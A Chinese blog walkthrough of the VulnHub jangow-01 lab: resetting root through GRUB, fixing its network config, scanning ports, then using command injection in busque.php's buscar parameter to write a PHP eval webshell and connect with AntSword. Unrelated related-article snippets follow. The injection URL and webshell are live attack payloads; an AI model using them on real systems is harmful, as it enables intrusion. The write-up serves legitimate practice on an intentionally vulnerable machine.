vulnhub靶场-jangow-01-1.0.1(截止至获取shell)

devtools/2024/12/28 7:38:27/

安装靶机后我们发现我们扫描不到靶机的ip,所以我们需要修改靶机的配置文件

系统启动时,长按shift键,选择第二个选项,回车后再选择第二个选项

然后不要回车,按e,进入后向下翻 找到并删除删除“recovery nomodeset”并在最后添加“quiet splash rw init=/bin/bash”,修改完成后按F10启动

ro/rw表示以只读(ro)/读写(rw)模式挂载根文件系统;

quiet用于设置静默模式;

splash用于设置启动时的屏幕输出;

init用于指定内核挂载根文件系统后运行的第一个用户空间程序的绝对路径(也有文章描述为设置内核执行的初始化进程名)。

输入passwd修改root账户的密码

修改完成后重启登录,账户名root 密码为刚才修改的密码

使用ipconfig -a 查看自己的网卡名

然后vim /etc/network/interfaces来修改自己的网卡信息

该文件是一个重要的网络配置文件,通常用于配置 Linux 系统中的网络接口和网络参数。它在 Debian 系统及其衍生版本(如 Ubuntu)中广泛使用,用于定义网络接口的配置信息,如IP地址、子网掩码、网关、DNS等。

将此处原先的网卡名称修改为自己的网卡名称

修改完成后按esc 然后 shift+/wq! 保存退出,然后重启靶机,这样kali就能扫描到我们的靶机IP了

扫描到了靶机IP,为192.168.171.129

扫描端口,只存在80端口以及21端口

扫描目录,只存在一个/site目录,访问,查看页面并没有什么功能点

点击Buscar,此时url可能有突破点

我们尝试whoami,成功执行,说明此处存在命令执行漏洞

我们尝试将一句话木马直接写入

http://192.168.171.129/site/busque.php?buscar=echo '<?php @eval($_POST["cmd"])?>' > shell.php

//注意 写入该木马时,echo 后面要写入到指定文件的内容需要用单引号括起来,不可以使用双引号,$_POST里的使不使用单双引号括起来都行

写入成功,我们尝试访问shell.php并执行参数,则获取shell成功,后续使用蚁剑连接即可


http://www.ppmy.cn/devtools/146046.html

相关文章

apifox调用jar程序

背景&#xff1a;测试接口要用到签名&#xff0c;所以想通过apifox直接设置签名相关字段 解决方案&#xff1a;开始是准备些javascript脚本&#xff0c;但是一直存在依赖的方法找不到问题&#xff0c;后面知道可以调用java程序&#xff0c;简直方便多了 一、写java程序&#x…

手机IP地址:定义、查看与切换方法

在移动互联网时代&#xff0c;手机已成为我们日常生活中不可或缺的一部分。无论是浏览网页、社交互动&#xff0c;还是在线购物、移动支付&#xff0c;手机都扮演着至关重要的角色。然而&#xff0c;在这些便捷的网络活动中&#xff0c;一个关键的概念常常被忽视&#xff0c;那…

Vue零基础教程|从前端框架到GIS开发系列课程(七)响应式系统介绍

前文指路&#xff1a;《Vue零基础教程》&#xff0c;从前端框架到GIS开发系列课程 Vue零基础教程|从前端框架到GIS开发系列课程&#xff08;二&#xff09; Vue零基础教程|从前端框架到GIS开发系列课程&#xff08;三&#xff09;模板语法 Vue零基础教程|从前端框架到GIS开发…

frameworks 之 WMS层级树

frameworks 之 WMS层级树 1. 容器类1. WindowContainer2. RootWindowContainer3. DisplayContent4. DisplayAreas4. 1 DisplayArea.Tokens4. 2 TaskDisplayArea4. 3 DisplayArea.Dimmable 5. WindowToken5.1 WallpaperWindowToken5.2 ActivityRecord 6. TaskFragment6.1 Task 7…

【QT】自定义QLabel

QLabel 既可以加载图片也可以绘制图形。 本章通过QLabel实现图片加载并在QLabel上绘制任意图形。 在使用 QLabel 实现加载图片功能&#xff0c;并在图片上绘制任意图形时&#xff0c;图片发生缩放后会存在图形拉伸情况&#xff0c;导致结果存在偏差。&#xff08;原因分析这里不…

[按键精灵IOS安卓版][脚本基础知识]按键post基本写法

这一期我们来讲按键post的写法&#xff0c;希望通过本期的学习&#xff0c;实现常见的post提交都能编写。 下面开始讲解&#xff1a; 一、使用的命令&#xff1a;url.httppost 选用这个命令的理由是它的参数比较全。 二、post请求都有哪些参数&#xff08;可能用到&#xf…

windows下vscode使用msvc编译器出现中文乱码

文章目录 [toc]1、概述2、修改已创建文件编码3、修改vscode默认编码 更多精彩内容&#x1f449;内容导航 &#x1f448;&#x1f449;C &#x1f448;&#x1f449;开发工具 &#x1f448; 1、概述 在使用MSVC编译器时&#xff0c;出现中文报错的问题可能与编码格式有关。UTF-…

qt创建线程的四种方式

第一种 继承QThread类&#xff0c;然后重写run()函数 // 线程一 Mythread1 new CMyThread; connect(Mythread1,&CMyThread::sig_num,this,&MainWindow::slots_thread1); connect(ui->pushButton,&QPushButton::clicked,[](){Mythread1->m_state ThreadSt…